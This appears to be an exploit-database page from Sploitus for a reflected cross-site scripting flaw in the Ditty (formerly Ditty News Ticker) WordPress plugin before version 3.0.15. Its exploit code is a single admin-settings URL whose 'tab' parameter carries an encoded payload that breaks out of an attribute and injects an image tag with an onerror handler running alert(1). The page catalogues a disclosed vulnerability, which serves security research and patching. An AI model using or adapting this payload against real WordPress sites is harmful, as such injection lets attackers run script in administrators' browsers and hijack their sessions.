Sploitus

Exploit for Ditty (formerly Ditty News Ticker) < 3.0.15 - Reflected Cross-Site Scripting (XSS)

wpexploit · 2022-02-09

Exploit Code

MARKDOWN2 lines
## https://sploitus.com/exploit?id=WPEX-ID:40F36692-C898-4441-AD24-2DC17856BD74
http://127.0.0.1:8001/wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%281%29%3E